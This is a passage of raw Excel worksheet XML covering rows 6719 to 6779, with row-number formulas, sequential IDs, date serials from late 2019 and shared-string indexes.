        <v>9975</v>
      </c>
      <c r="G6719" t="s">
        <v>13259</v>
      </c>
    </row>
    <row r="6720" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6720">
        <f t="shared" si="104"/>
        <v>6719</v>
      </c>
      <c r="B6720">
        <v>1719</v>
      </c>
      <c r="C6720" t="s">
        <v>9973</v>
      </c>
      <c r="D6720" s="1">
        <v>43754</v>
      </c>
      <c r="E6720" t="s">
        <v>13260</v>
      </c>
      <c r="F6720" t="s">
        <v>9975</v>
      </c>
      <c r="G6720" t="s">
        <v>13261</v>
      </c>
    </row>
    <row r="6721" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6721">
        <f t="shared" si="104"/>
        <v>6720</v>
      </c>
      <c r="B6721">
        <v>1720</v>
      </c>
      <c r="C6721" t="s">
        <v>9973</v>
      </c>
      <c r="D6721" s="1">
        <v>43745</v>
      </c>
      <c r="E6721" t="s">
        <v>13262</v>
      </c>
      <c r="F6721" t="s">
        <v>9975</v>
      </c>
      <c r="G6721" t="s">
        <v>13263</v>
      </c>
    </row>
    <row r="6722" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6722">
        <f t="shared" si="104"/>
        <v>6721</v>
      </c>
      <c r="B6722">
        <v>1721</v>
      </c>
      <c r="C6722" t="s">
        <v>9973</v>
      </c>
      <c r="D6722" s="1">
        <v>43748</v>
      </c>
      <c r="E6722" t="s">
        <v>13264</v>
      </c>
      <c r="F6722" t="s">
        <v>9975</v>
      </c>
      <c r="G6722" t="s">
        <v>13265</v>
      </c>
    </row>
    <row r="6723" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6723">
        <f t="shared" ref="A6723:A6786" si="105">+ROW(A6722)</f>
        <v>6722</v>
      </c>
      <c r="B6723">
        <v>1722</v>
      </c>
      <c r="C6723" t="s">
        <v>9973</v>
      </c>
      <c r="D6723" s="1">
        <v>43742</v>
      </c>
      <c r="E6723" t="s">
        <v>13266</v>
      </c>
      <c r="F6723" t="s">
        <v>9975</v>
      </c>
      <c r="G6723" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="6724" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6724">
        <f t="shared" si="105"/>
        <v>6723</v>
      </c>
      <c r="B6724">
        <v>1723</v>
      </c>
      <c r="C6724" t="s">
        <v>9973</v>
      </c>
      <c r="D6724" s="1">
        <v>43740</v>
      </c>
      <c r="E6724" t="s">
        <v>13268</v>
      </c>
      <c r="F6724" t="s">
        <v>9975</v>
      </c>
      <c r="G6724" t="s">
        <v>13269</v>
      </c>
    </row>
    <row r="6725" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6725">
        <f t="shared" si="105"/>
        <v>6724</v>
      </c>
      <c r="B6725">
        <v>1724</v>
      </c>
      <c r="C6725" t="s">
        <v>9973</v>
      </c>
      <c r="D6725" s="1">
        <v>43756</v>
      </c>
      <c r="E6725" t="s">
        <v>13270</v>
      </c>
      <c r="F6725" t="s">
        <v>9975</v>
      </c>
      <c r="G6725" t="s">
        <v>13271</v>
      </c>
    </row>
    <row r="6726" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6726">
        <f t="shared" si="105"/>
        <v>6725</v>
      </c>
      <c r="B6726">
        <v>1725</v>
      </c>
      <c r="C6726" t="s">
        <v>9973</v>
      </c>
      <c r="D6726" s="1">
        <v>43748</v>
      </c>
      <c r="E6726" t="s">
        <v>13272</v>
      </c>
      <c r="F6726" t="s">
        <v>9975</v>
      </c>
      <c r="G6726" t="s">
        <v>13273</v>
      </c>
    </row>
    <row r="6727" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6727">
        <f t="shared" si="105"/>
        <v>6726</v>
      </c>
      <c r="B6727">
        <v>1726</v>
      </c>
      <c r="C6727" t="s">
        <v>9973</v>
      </c>
      <c r="D6727" s="1">
        <v>43743</v>
      </c>
      <c r="E6727" t="s">
        <v>13274</v>
      </c>
      <c r="F6727" t="s">
        <v>9975</v>
      </c>
      <c r="G6727" t="s">
        <v>13275</v>
      </c>
    </row>
    <row r="6728" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6728">
        <f t="shared" si="105"/>
        <v>6727</v>
      </c>
      <c r="B6728">
        <v>1727</v>
      </c>
      <c r="C6728" t="s">
        <v>9973</v>
      </c>
      <c r="D6728" s="1">
        <v>43741</v>
      </c>
      <c r="E6728" t="s">
        <v>10099</v>
      </c>
      <c r="F6728" t="s">
        <v>9975</v>
      </c>
      <c r="G6728" t="s">
        <v>13276</v>
      </c>
    </row>
    <row r="6729" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6729">
        <f t="shared" si="105"/>
        <v>6728</v>
      </c>
      <c r="B6729">
        <v>1728</v>
      </c>
      <c r="C6729" t="s">
        <v>9973</v>
      </c>
      <c r="D6729" s="1">
        <v>43757</v>
      </c>
      <c r="E6729" t="s">
        <v>13277</v>
      </c>
      <c r="F6729" t="s">
        <v>9975</v>
      </c>
      <c r="G6729" t="s">
        <v>13278</v>
      </c>
    </row>
    <row r="6730" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6730">
        <f t="shared" si="105"/>
        <v>6729</v>
      </c>
      <c r="B6730">
        <v>1729</v>
      </c>
      <c r="C6730" t="s">
        <v>9973</v>
      </c>
      <c r="D6730" s="1">
        <v>43750</v>
      </c>
      <c r="E6730" t="s">
        <v>13279</v>
      </c>
      <c r="F6730" t="s">
        <v>9975</v>
      </c>
      <c r="G6730" t="s">
        <v>13280</v>
      </c>
    </row>
    <row r="6731" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6731">
        <f t="shared" si="105"/>
        <v>6730</v>
      </c>
      <c r="B6731">
        <v>1730</v>
      </c>
      <c r="C6731" t="s">
        <v>9973</v>
      </c>
      <c r="D6731" s="1">
        <v>43756</v>
      </c>
      <c r="E6731" t="s">
        <v>13281</v>
      </c>
      <c r="F6731" t="s">
        <v>9975</v>
      </c>
      <c r="G6731" t="s">
        <v>13282</v>
      </c>
    </row>
    <row r="6732" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6732">
        <f t="shared" si="105"/>
        <v>6731</v>
      </c>
      <c r="B6732">
        <v>1731</v>
      </c>
      <c r="C6732" t="s">
        <v>9973</v>
      </c>
      <c r="D6732" s="1">
        <v>43749</v>
      </c>
      <c r="E6732" t="s">
        <v>13283</v>
      </c>
      <c r="F6732" t="s">
        <v>9975</v>
      </c>
      <c r="G6732" t="s">
        <v>13284</v>
      </c>
    </row>
    <row r="6733" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6733">
        <f t="shared" si="105"/>
        <v>6732</v>
      </c>
      <c r="B6733">
        <v>1732</v>
      </c>
      <c r="C6733" t="s">
        <v>9973</v>
      </c>
      <c r="D6733" s="1">
        <v>43741</v>
      </c>
      <c r="E6733" t="s">
        <v>13285</v>
      </c>
      <c r="F6733" t="s">
        <v>9975</v>
      </c>
      <c r="G6733" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="6734" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6734">
        <f t="shared" si="105"/>
        <v>6733</v>
      </c>
      <c r="B6734">
        <v>1733</v>
      </c>
      <c r="C6734" t="s">
        <v>9973</v>
      </c>
      <c r="D6734" s="1">
        <v>43754</v>
      </c>
      <c r="E6734" t="s">
        <v>13287</v>
      </c>
      <c r="F6734" t="s">
        <v>9978</v>
      </c>
      <c r="G6734" t="s">
        <v>13288</v>
      </c>
    </row>
    <row r="6735" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6735">
        <f t="shared" si="105"/>
        <v>6734</v>
      </c>
      <c r="B6735">
        <v>1734</v>
      </c>
      <c r="C6735" t="s">
        <v>9973</v>
      </c>
      <c r="D6735" s="1">
        <v>43744</v>
      </c>
      <c r="E6735" t="s">
        <v>13289</v>
      </c>
      <c r="F6735" t="s">
        <v>9975</v>
      </c>
      <c r="G6735" t="s">
        <v>13290</v>
      </c>
    </row>
    <row r="6736" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6736">
        <f t="shared" si="105"/>
        <v>6735</v>
      </c>
      <c r="B6736">
        <v>1735</v>
      </c>
      <c r="C6736" t="s">
        <v>9973</v>
      </c>
      <c r="D6736" s="1">
        <v>43741</v>
      </c>
      <c r="E6736" t="s">
        <v>13291</v>
      </c>
      <c r="F6736" t="s">
        <v>9975</v>
      </c>
      <c r="G6736" t="s">
        <v>13292</v>
      </c>
    </row>
    <row r="6737" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6737">
        <f t="shared" si="105"/>
        <v>6736</v>
      </c>
      <c r="B6737">
        <v>1736</v>
      </c>
      <c r="C6737" t="s">
        <v>9973</v>
      </c>
      <c r="D6737" s="1">
        <v>43755</v>
      </c>
      <c r="E6737" t="s">
        <v>13293</v>
      </c>
      <c r="F6737" t="s">
        <v>9975</v>
      </c>
      <c r="G6737" t="s">
        <v>13294</v>
      </c>
    </row>
    <row r="6738" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6738">
        <f t="shared" si="105"/>
        <v>6737</v>
      </c>
      <c r="B6738">
        <v>1737</v>
      </c>
      <c r="C6738" t="s">
        <v>9973</v>
      </c>
      <c r="D6738" s="1">
        <v>43754</v>
      </c>
      <c r="E6738" t="s">
        <v>13295</v>
      </c>
      <c r="F6738" t="s">
        <v>9975</v>
      </c>
      <c r="G6738" t="s">
        <v>13296</v>
      </c>
    </row>
    <row r="6739" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6739">
        <f t="shared" si="105"/>
        <v>6738</v>
      </c>
      <c r="B6739">
        <v>1738</v>
      </c>
      <c r="C6739" t="s">
        <v>9973</v>
      </c>
      <c r="D6739" s="1">
        <v>43750</v>
      </c>
      <c r="E6739" t="s">
        <v>13297</v>
      </c>
      <c r="F6739" t="s">
        <v>9975</v>
      </c>
      <c r="G6739" t="s">
        <v>13298</v>
      </c>
    </row>
    <row r="6740" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6740">
        <f t="shared" si="105"/>
        <v>6739</v>
      </c>
      <c r="B6740">
        <v>1739</v>
      </c>
      <c r="C6740" t="s">
        <v>9973</v>
      </c>
      <c r="D6740" s="1">
        <v>43739</v>
      </c>
      <c r="E6740" t="s">
        <v>13299</v>
      </c>
      <c r="F6740" t="s">
        <v>9975</v>
      </c>
      <c r="G6740" t="s">
        <v>13300</v>
      </c>
    </row>
    <row r="6741" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6741">
        <f t="shared" si="105"/>
        <v>6740</v>
      </c>
      <c r="B6741">
        <v>1740</v>
      </c>
      <c r="C6741" t="s">
        <v>9973</v>
      </c>
      <c r="D6741" s="1">
        <v>43749</v>
      </c>
      <c r="E6741" t="s">
        <v>13301</v>
      </c>
      <c r="F6741" t="s">
        <v>9975</v>
      </c>
      <c r="G6741" t="s">
        <v>13302</v>
      </c>
    </row>
    <row r="6742" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6742">
        <f t="shared" si="105"/>
        <v>6741</v>
      </c>
      <c r="B6742">
        <v>1741</v>
      </c>
      <c r="C6742" t="s">
        <v>9973</v>
      </c>
      <c r="D6742" s="1">
        <v>43755</v>
      </c>
      <c r="E6742" t="s">
        <v>13303</v>
      </c>
      <c r="F6742" t="s">
        <v>9975</v>
      </c>
      <c r="G6742" t="s">
        <v>13304</v>
      </c>
    </row>
    <row r="6743" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6743">
        <f t="shared" si="105"/>
        <v>6742</v>
      </c>
      <c r="B6743">
        <v>1742</v>
      </c>
      <c r="C6743" t="s">
        <v>9973</v>
      </c>
      <c r="D6743" s="1">
        <v>43755</v>
      </c>
      <c r="E6743" t="s">
        <v>13305</v>
      </c>
      <c r="F6743" t="s">
        <v>9975</v>
      </c>
      <c r="G6743" t="s">
        <v>13306</v>
      </c>
    </row>
    <row r="6744" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6744">
        <f t="shared" si="105"/>
        <v>6743</v>
      </c>
      <c r="B6744">
        <v>1743</v>
      </c>
      <c r="C6744" t="s">
        <v>9973</v>
      </c>
      <c r="D6744" s="1">
        <v>43744</v>
      </c>
      <c r="E6744" t="s">
        <v>13307</v>
      </c>
      <c r="F6744" t="s">
        <v>9975</v>
      </c>
      <c r="G6744" t="s">
        <v>13308</v>
      </c>
    </row>
    <row r="6745" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6745">
        <f t="shared" si="105"/>
        <v>6744</v>
      </c>
      <c r="B6745">
        <v>1744</v>
      </c>
      <c r="C6745" t="s">
        <v>9973</v>
      </c>
      <c r="D6745" s="1">
        <v>43746</v>
      </c>
      <c r="E6745" t="s">
        <v>13309</v>
      </c>
      <c r="F6745" t="s">
        <v>9975</v>
      </c>
      <c r="G6745" t="s">
        <v>13310</v>
      </c>
    </row>
    <row r="6746" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6746">
        <f t="shared" si="105"/>
        <v>6745</v>
      </c>
      <c r="B6746">
        <v>1745</v>
      </c>
      <c r="C6746" t="s">
        <v>9973</v>
      </c>
      <c r="D6746" s="1">
        <v>43740</v>
      </c>
      <c r="E6746" t="s">
        <v>13311</v>
      </c>
      <c r="F6746" t="s">
        <v>9975</v>
      </c>
      <c r="G6746" t="s">
        <v>13312</v>
      </c>
    </row>
    <row r="6747" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6747">
        <f t="shared" si="105"/>
        <v>6746</v>
      </c>
      <c r="B6747">
        <v>1746</v>
      </c>
      <c r="C6747" t="s">
        <v>9973</v>
      </c>
      <c r="D6747" s="1">
        <v>43755</v>
      </c>
      <c r="E6747" t="s">
        <v>13313</v>
      </c>
      <c r="F6747" t="s">
        <v>9975</v>
      </c>
      <c r="G6747" t="s">
        <v>13314</v>
      </c>
    </row>
    <row r="6748" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6748">
        <f t="shared" si="105"/>
        <v>6747</v>
      </c>
      <c r="B6748">
        <v>1747</v>
      </c>
      <c r="C6748" t="s">
        <v>9973</v>
      </c>
      <c r="D6748" s="1">
        <v>43752</v>
      </c>
      <c r="E6748" t="s">
        <v>13315</v>
      </c>
      <c r="F6748" t="s">
        <v>9975</v>
      </c>
      <c r="G6748" t="s">
        <v>13316</v>
      </c>
    </row>
    <row r="6749" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6749">
        <f t="shared" si="105"/>
        <v>6748</v>
      </c>
      <c r="B6749">
        <v>1748</v>
      </c>
      <c r="C6749" t="s">
        <v>9973</v>
      </c>
      <c r="D6749" s="1">
        <v>43746</v>
      </c>
      <c r="E6749" t="s">
        <v>13317</v>
      </c>
      <c r="F6749" t="s">
        <v>9975</v>
      </c>
      <c r="G6749" t="s">
        <v>13318</v>
      </c>
    </row>
    <row r="6750" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6750">
        <f t="shared" si="105"/>
        <v>6749</v>
      </c>
      <c r="B6750">
        <v>1749</v>
      </c>
      <c r="C6750" t="s">
        <v>9973</v>
      </c>
      <c r="D6750" s="1">
        <v>43741</v>
      </c>
      <c r="E6750" t="s">
        <v>13319</v>
      </c>
      <c r="F6750" t="s">
        <v>9975</v>
      </c>
      <c r="G6750" t="s">
        <v>13320</v>
      </c>
    </row>
    <row r="6751" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6751">
        <f t="shared" si="105"/>
        <v>6750</v>
      </c>
      <c r="B6751">
        <v>1750</v>
      </c>
      <c r="C6751" t="s">
        <v>9973</v>
      </c>
      <c r="D6751" s="1">
        <v>43752</v>
      </c>
      <c r="E6751" t="s">
        <v>13321</v>
      </c>
      <c r="F6751" t="s">
        <v>9975</v>
      </c>
      <c r="G6751" t="s">
        <v>13322</v>
      </c>
    </row>
    <row r="6752" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6752">
        <f t="shared" si="105"/>
        <v>6751</v>
      </c>
      <c r="B6752">
        <v>1751</v>
      </c>
      <c r="C6752" t="s">
        <v>9973</v>
      </c>
      <c r="D6752" s="1">
        <v>43752</v>
      </c>
      <c r="E6752" t="s">
        <v>13323</v>
      </c>
      <c r="F6752" t="s">
        <v>9975</v>
      </c>
      <c r="G6752" t="s">
        <v>13324</v>
      </c>
    </row>
    <row r="6753" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6753">
        <f t="shared" si="105"/>
        <v>6752</v>
      </c>
      <c r="B6753">
        <v>1752</v>
      </c>
      <c r="C6753" t="s">
        <v>9973</v>
      </c>
      <c r="D6753" s="1">
        <v>43745</v>
      </c>
      <c r="E6753" t="s">
        <v>13325</v>
      </c>
      <c r="F6753" t="s">
        <v>9975</v>
      </c>
      <c r="G6753" t="s">
        <v>13326</v>
      </c>
    </row>
    <row r="6754" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6754">
        <f t="shared" si="105"/>
        <v>6753</v>
      </c>
      <c r="B6754">
        <v>1753</v>
      </c>
      <c r="C6754" t="s">
        <v>9973</v>
      </c>
      <c r="D6754" s="1">
        <v>43756</v>
      </c>
      <c r="E6754" t="s">
        <v>13327</v>
      </c>
      <c r="F6754" t="s">
        <v>9975</v>
      </c>
      <c r="G6754" t="s">
        <v>13328</v>
      </c>
    </row>
    <row r="6755" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6755">
        <f t="shared" si="105"/>
        <v>6754</v>
      </c>
      <c r="B6755">
        <v>1754</v>
      </c>
      <c r="C6755" t="s">
        <v>9973</v>
      </c>
      <c r="D6755" s="1">
        <v>43747</v>
      </c>
      <c r="E6755" t="s">
        <v>13329</v>
      </c>
      <c r="F6755" t="s">
        <v>9975</v>
      </c>
      <c r="G6755" t="s">
        <v>13330</v>
      </c>
    </row>
    <row r="6756" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6756">
        <f t="shared" si="105"/>
        <v>6755</v>
      </c>
      <c r="B6756">
        <v>1755</v>
      </c>
      <c r="C6756" t="s">
        <v>9973</v>
      </c>
      <c r="D6756" s="1">
        <v>43747</v>
      </c>
      <c r="E6756" t="s">
        <v>13331</v>
      </c>
      <c r="F6756" t="s">
        <v>9975</v>
      </c>
      <c r="G6756" t="s">
        <v>13332</v>
      </c>
    </row>
    <row r="6757" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6757">
        <f t="shared" si="105"/>
        <v>6756</v>
      </c>
      <c r="B6757">
        <v>1756</v>
      </c>
      <c r="C6757" t="s">
        <v>9973</v>
      </c>
      <c r="D6757" s="1">
        <v>43746</v>
      </c>
      <c r="E6757" t="s">
        <v>13333</v>
      </c>
      <c r="F6757" t="s">
        <v>9975</v>
      </c>
      <c r="G6757" t="s">
        <v>13334</v>
      </c>
    </row>
    <row r="6758" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6758">
        <f t="shared" si="105"/>
        <v>6757</v>
      </c>
      <c r="B6758">
        <v>1757</v>
      </c>
      <c r="C6758" t="s">
        <v>9973</v>
      </c>
      <c r="D6758" s="1">
        <v>43751</v>
      </c>
      <c r="E6758" t="s">
        <v>12226</v>
      </c>
      <c r="F6758" t="s">
        <v>9975</v>
      </c>
      <c r="G6758" t="s">
        <v>13335</v>
      </c>
    </row>
    <row r="6759" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6759">
        <f t="shared" si="105"/>
        <v>6758</v>
      </c>
      <c r="B6759">
        <v>1758</v>
      </c>
      <c r="C6759" t="s">
        <v>9973</v>
      </c>
      <c r="D6759" s="1">
        <v>43747</v>
      </c>
      <c r="E6759" t="s">
        <v>13336</v>
      </c>
      <c r="F6759" t="s">
        <v>9975</v>
      </c>
      <c r="G6759" t="s">
        <v>13337</v>
      </c>
    </row>
    <row r="6760" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6760">
        <f t="shared" si="105"/>
        <v>6759</v>
      </c>
      <c r="B6760">
        <v>1759</v>
      </c>
      <c r="C6760" t="s">
        <v>9973</v>
      </c>
      <c r="D6760" s="1">
        <v>43740</v>
      </c>
      <c r="E6760" t="s">
        <v>13338</v>
      </c>
      <c r="F6760" t="s">
        <v>9975</v>
      </c>
      <c r="G6760" t="s">
        <v>13339</v>
      </c>
    </row>
    <row r="6761" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6761">
        <f t="shared" si="105"/>
        <v>6760</v>
      </c>
      <c r="B6761">
        <v>1760</v>
      </c>
      <c r="C6761" t="s">
        <v>9973</v>
      </c>
      <c r="D6761" s="1">
        <v>43740</v>
      </c>
      <c r="E6761" t="s">
        <v>13340</v>
      </c>
      <c r="F6761" t="s">
        <v>9975</v>
      </c>
      <c r="G6761" t="s">
        <v>13341</v>
      </c>
    </row>
    <row r="6762" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6762">
        <f t="shared" si="105"/>
        <v>6761</v>
      </c>
      <c r="B6762">
        <v>1761</v>
      </c>
      <c r="C6762" t="s">
        <v>9973</v>
      </c>
      <c r="D6762" s="1">
        <v>43757</v>
      </c>
      <c r="E6762" t="s">
        <v>13342</v>
      </c>
      <c r="F6762" t="s">
        <v>9975</v>
      </c>
      <c r="G6762" t="s">
        <v>13343</v>
      </c>
    </row>
    <row r="6763" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6763">
        <f t="shared" si="105"/>
        <v>6762</v>
      </c>
      <c r="B6763">
        <v>1762</v>
      </c>
      <c r="C6763" t="s">
        <v>9973</v>
      </c>
      <c r="D6763" s="1">
        <v>43740</v>
      </c>
      <c r="E6763" t="s">
        <v>13344</v>
      </c>
      <c r="F6763" t="s">
        <v>9975</v>
      </c>
      <c r="G6763" t="s">
        <v>13345</v>
      </c>
    </row>
    <row r="6764" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6764">
        <f t="shared" si="105"/>
        <v>6763</v>
      </c>
      <c r="B6764">
        <v>1763</v>
      </c>
      <c r="C6764" t="s">
        <v>9973</v>
      </c>
      <c r="D6764" s="1">
        <v>43741</v>
      </c>
      <c r="E6764" t="s">
        <v>13346</v>
      </c>
      <c r="F6764" t="s">
        <v>9975</v>
      </c>
      <c r="G6764" t="s">
        <v>13347</v>
      </c>
    </row>
    <row r="6765" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6765">
        <f t="shared" si="105"/>
        <v>6764</v>
      </c>
      <c r="B6765">
        <v>1764</v>
      </c>
      <c r="C6765" t="s">
        <v>9973</v>
      </c>
      <c r="D6765" s="1">
        <v>43755</v>
      </c>
      <c r="E6765" t="s">
        <v>13348</v>
      </c>
      <c r="F6765" t="s">
        <v>9975</v>
      </c>
      <c r="G6765" t="s">
        <v>13349</v>
      </c>
    </row>
    <row r="6766" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6766">
        <f t="shared" si="105"/>
        <v>6765</v>
      </c>
      <c r="B6766">
        <v>1765</v>
      </c>
      <c r="C6766" t="s">
        <v>9973</v>
      </c>
      <c r="D6766" s="1">
        <v>43750</v>
      </c>
      <c r="E6766" t="s">
        <v>13350</v>
      </c>
      <c r="F6766" t="s">
        <v>9975</v>
      </c>
      <c r="G6766" t="s">
        <v>13351</v>
      </c>
    </row>
    <row r="6767" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6767">
        <f t="shared" si="105"/>
        <v>6766</v>
      </c>
      <c r="B6767">
        <v>1766</v>
      </c>
      <c r="C6767" t="s">
        <v>9973</v>
      </c>
      <c r="D6767" s="1">
        <v>43745</v>
      </c>
      <c r="E6767" t="s">
        <v>13352</v>
      </c>
      <c r="F6767" t="s">
        <v>9975</v>
      </c>
      <c r="G6767" t="s">
        <v>13353</v>
      </c>
    </row>
    <row r="6768" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6768">
        <f t="shared" si="105"/>
        <v>6767</v>
      </c>
      <c r="B6768">
        <v>1767</v>
      </c>
      <c r="C6768" t="s">
        <v>9973</v>
      </c>
      <c r="D6768" s="1">
        <v>43740</v>
      </c>
      <c r="E6768" t="s">
        <v>13354</v>
      </c>
      <c r="F6768" t="s">
        <v>9975</v>
      </c>
      <c r="G6768" t="s">
        <v>13355</v>
      </c>
    </row>
    <row r="6769" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6769">
        <f t="shared" si="105"/>
        <v>6768</v>
      </c>
      <c r="B6769">
        <v>1768</v>
      </c>
      <c r="C6769" t="s">
        <v>9973</v>
      </c>
      <c r="D6769" s="1">
        <v>43756</v>
      </c>
      <c r="E6769" t="s">
        <v>13356</v>
      </c>
      <c r="F6769" t="s">
        <v>9975</v>
      </c>
      <c r="G6769" t="s">
        <v>13357</v>
      </c>
    </row>
    <row r="6770" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6770">
        <f t="shared" si="105"/>
        <v>6769</v>
      </c>
      <c r="B6770">
        <v>1769</v>
      </c>
      <c r="C6770" t="s">
        <v>9973</v>
      </c>
      <c r="D6770" s="1">
        <v>43745</v>
      </c>
      <c r="E6770" t="s">
        <v>13358</v>
      </c>
      <c r="F6770" t="s">
        <v>9975</v>
      </c>
      <c r="G6770" t="s">
        <v>13359</v>
      </c>
    </row>
    <row r="6771" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6771">
        <f t="shared" si="105"/>
        <v>6770</v>
      </c>
      <c r="B6771">
        <v>1770</v>
      </c>
      <c r="C6771" t="s">
        <v>9973</v>
      </c>
      <c r="D6771" s="1">
        <v>43757</v>
      </c>
      <c r="E6771" t="s">
        <v>13360</v>
      </c>
      <c r="F6771" t="s">
        <v>9975</v>
      </c>
      <c r="G6771" t="s">
        <v>13361</v>
      </c>
    </row>
    <row r="6772" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6772">
        <f t="shared" si="105"/>
        <v>6771</v>
      </c>
      <c r="B6772">
        <v>1771</v>
      </c>
      <c r="C6772" t="s">
        <v>9973</v>
      </c>
      <c r="D6772" s="1">
        <v>43748</v>
      </c>
      <c r="E6772" t="s">
        <v>13362</v>
      </c>
      <c r="F6772" t="s">
        <v>9975</v>
      </c>
      <c r="G6772" t="s">
        <v>13363</v>
      </c>
    </row>
    <row r="6773" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6773">
        <f t="shared" si="105"/>
        <v>6772</v>
      </c>
      <c r="B6773">
        <v>1772</v>
      </c>
      <c r="C6773" t="s">
        <v>9973</v>
      </c>
      <c r="D6773" s="1">
        <v>43754</v>
      </c>
      <c r="E6773" t="s">
        <v>13364</v>
      </c>
      <c r="F6773" t="s">
        <v>9975</v>
      </c>
      <c r="G6773" t="s">
        <v>13365</v>
      </c>
    </row>
    <row r="6774" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6774">
        <f t="shared" si="105"/>
        <v>6773</v>
      </c>
      <c r="B6774">
        <v>1773</v>
      </c>
      <c r="C6774" t="s">
        <v>9973</v>
      </c>
      <c r="D6774" s="1">
        <v>43740</v>
      </c>
      <c r="E6774" t="s">
        <v>13366</v>
      </c>
      <c r="F6774" t="s">
        <v>9975</v>
      </c>
      <c r="G6774" t="s">
        <v>13367</v>
      </c>
    </row>
    <row r="6775" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6775">
        <f t="shared" si="105"/>
        <v>6774</v>
      </c>
      <c r="B6775">
        <v>1774</v>
      </c>
      <c r="C6775" t="s">
        <v>9973</v>
      </c>
      <c r="D6775" s="1">
        <v>43741</v>
      </c>
      <c r="E6775" t="s">
        <v>13368</v>
      </c>
      <c r="F6775" t="s">
        <v>9975</v>
      </c>
      <c r="G6775" t="s">
        <v>13369</v>
      </c>
    </row>
    <row r="6776" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6776">
        <f t="shared" si="105"/>
        <v>6775</v>
      </c>
      <c r="B6776">
        <v>1775</v>
      </c>
      <c r="C6776" t="s">
        <v>9973</v>
      </c>
      <c r="D6776" s="1">
        <v>43754</v>
      </c>
      <c r="E6776" t="s">
        <v>13370</v>
      </c>
      <c r="F6776" t="s">
        <v>9975</v>
      </c>
      <c r="G6776" t="s">
        <v>13371</v>
      </c>
    </row>
    <row r="6777" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6777">
        <f t="shared" si="105"/>
        <v>6776</v>
      </c>
      <c r="B6777">
        <v>1776</v>
      </c>
      <c r="C6777" t="s">
        <v>9973</v>
      </c>
      <c r="D6777" s="1">
        <v>43740</v>
      </c>
      <c r="E6777" t="s">
        <v>13372</v>
      </c>
      <c r="F6777" t="s">
        <v>9975</v>
      </c>
      <c r="G6777" t="s">
        <v>13373</v>
      </c>
    </row>
    <row r="6778" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6778">
        <f t="shared" si="105"/>
        <v>6777</v>
      </c>
      <c r="B6778">
        <v>1777</v>
      </c>
      <c r="C6778" t="s">
        <v>9973</v>
      </c>
      <c r="D6778" s="1">
        <v>43744</v>
      </c>
      <c r="E6778" t="s">
        <v>13374</v>
      </c>
      <c r="F6778" t="s">
        <v>9975</v>
      </c>
      <c r="G6778" t="s">
        <v>13375</v>
      </c>
    </row>
    <row r="6779" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6779">
        <f t="shared" si="105"/>
        <v>6778</v>
      </c>
      <c r="B6779">
        <v>1778</v>
      </c>
      <c r="C6779" t="s">
        <v>9973</v>
      </c>
      <c r="D6779" s="1">
        <v>43742</v>
      </c>
      <c r="E6779" t="s">
        <v>13376</v>
      </c>
      <c r="F6779" t="s">
        <v>9975</v>
      </c>
      <c r="G6779" t="s">
        <v>13377</v>
      </c>
    </row>
    <row r="6780" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6780">
        <f t="shared" si="105"/>
        <v>6779</v>
      </c>
      <c r="B6780">
        <v>1779</v>
      </c>
      <c r="C6780" t="s">
        <v>9973</v>
      </c>
      <c r="D6780" s="1">
        <v>43746</v>
      </c>
      <c r="E6780" t="s">
